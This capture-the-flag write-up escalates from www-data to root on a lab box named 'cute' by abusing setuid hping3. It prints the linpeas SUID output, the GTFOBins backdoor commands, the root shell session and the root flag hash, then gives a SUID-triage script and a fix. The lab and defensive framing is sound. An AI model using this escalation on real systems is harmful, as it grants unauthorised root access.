═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                                                                                                
                               ╚═══════════════════╝                                                                                                                                                                               
OS: Linux version 4.19.0-10-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.132-1 (2020-07-24)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: cute.calipendula
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)                                                            
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)                                                                                                 
                                                                                                                                                                                                                                   
                                                        
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                                                                                
                               ╚═══════════════════╝                                                                                                                                                                               
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                                                   
strings Not Found                                                                                                                                                                                                                  
strace Not Found                                                                                                                                                                                                                   
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh                                                                                                                                                                              
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 23K Jan 15  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 154K Feb  2  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 10  2019 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 51K Jan 10  2019 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 154K Sep  6  2014 /usr/sbin/hping3
-rwsr-xr-x 1 root root 19K Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 427K Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device

www-data@cute:/tmp$ ls -alh /usr/sbin/hping3
ls -alh /usr/sbin/hping3
-rwsr-sr-x 1 root root 154K Sep  6  2014 /usr/sbin/hping3
www-data@cute:/tmp$ 

hping3 stands out in the list because it is both setuid and setgid root (-rwsr-sr-x). GTFOBins lists it as a SUID binary that keeps its elevated privileges; its entry reads:

  If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

  This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

    sudo install -m =xs $(which hping3) .

    ./hping3
    /bin/sh -p
    
www-data@cute:/tmp$ /usr/sbin/hping3
/usr/sbin/hping3
hping3> /bin/sh -p
/bin/sh -p
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------  3 root root 4.0K Sep 23  2020 .
drwxr-xr-x 18 root root 4.0K Sep 17  2020 ..
-rw-------  1 root root   70 Sep 23  2020 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root   36 Sep 17  2020 .lesshst
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  2 root root 4.0K Sep 17  2020 localweb
-rw-------  1 root root   33 Sep 18  2020 root.txt
# cat root.txt
cat root.txt
0b18032c2d06d9e738ede9bc24795ff2
# 

Escalation succeeded and the root flag is in hand. We never even looked at the other ports! One caveat: the id output shows uid=33 with euid=0, because sh -p keeps the effective uid inherited from the SUID hping3 rather than making the real uid root. That is enough to read /root/root.txt, but software that checks the real uid will still see www-data. The root cause is how the binary was installed: hping3 needs raw sockets, and making it setuid/setgid root instead of limiting it to CAP_NET_RAW hands every local user a root shell through its interactive prompt.
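As an added example (not part of the original write-up, and not linpeas or GTFOBins code), the following POSIX shell function triages an `ls -l`-style listing of SUID/SGID files the way the enumeration step above does by hand: it reads the setuid/setgid bits from the mode string and flags binaries whose basename appears in a hand-picked subset of the GTFOBins SUID list. The sample lines are constructed to mirror the linpeas output on the target, plus a non-SUID decoy, and GTFO_SUID is an illustrative subset, not the full catalogue.

```shell
#!/bin/sh
# Added example (not from the original write-up): triage an `ls -l`-style
# listing of SUID/SGID files and flag names that appear in a hand-picked
# subset of the GTFOBins SUID list.

# Constructed sample, mirroring the linpeas output on the target plus one
# non-SUID decoy (nmap) to show that the mode bits, not the name, decide.
SAMPLE='-rwsr-xr-x 1 root root 154K Feb  2  2020 /usr/bin/sudo
-rwsr-sr-x 1 root root 154K Sep  6  2014 /usr/sbin/hping3
-rwsr-xr-x 1 root root 63K Jan 10  2019 /usr/bin/su
-rwsr-xr-- 1 root messagebus 50K Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwxr-xr-x 1 root root 10K Mar 28  2017 /usr/bin/nmap'

# Illustrative subset of GTFOBins "SUID" entries (binaries that keep the
# elevated euid and can spawn a shell or read/write files). Extend as needed.
GTFO_SUID="hping3 nmap find vim python perl env cp bash"

# triage_suid LISTING
# For every line whose mode string carries a setuid or setgid bit, print:
#   <path> <owner> <suid|sgid|suid,sgid> <yes|no>
# where the last column says whether the basename is in GTFO_SUID.
triage_suid() {
  printf '%s\n' "$1" | while read -r mode _ owner _ _ _ _ _ path; do
    [ -n "$path" ] || continue
    bits=""
    # ls mode string: position 4 is the owner execute slot (s/S = setuid),
    # position 7 the group execute slot (s/S = setgid).
    case "$mode" in ???[sS]*) bits="suid" ;; esac
    case "$mode" in ??????[sS]*) bits="${bits:+$bits,}sgid" ;; esac
    [ -n "$bits" ] || continue
    name=${path##*/}
    hit=no
    for g in $GTFO_SUID; do
      [ "$g" = "$name" ] && hit=yes
    done
    printf '%s %s %s %s\n' "$path" "$owner" "$bits" "$hit"
  done
}

triage_suid "$SAMPLE"
```

On a live host, feed it `find / -perm /6000 -type f -exec ls -l {} + 2>/dev/null` instead of the sample. The fix on the target is `chmod u-s,g-s /usr/sbin/hping3`; if unprivileged users genuinely need the tool, `setcap cap_net_raw+ep /usr/sbin/hping3` grants raw sockets without handing out a root euid.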

posted @ 2022-11-17 11:39 Jason_huawen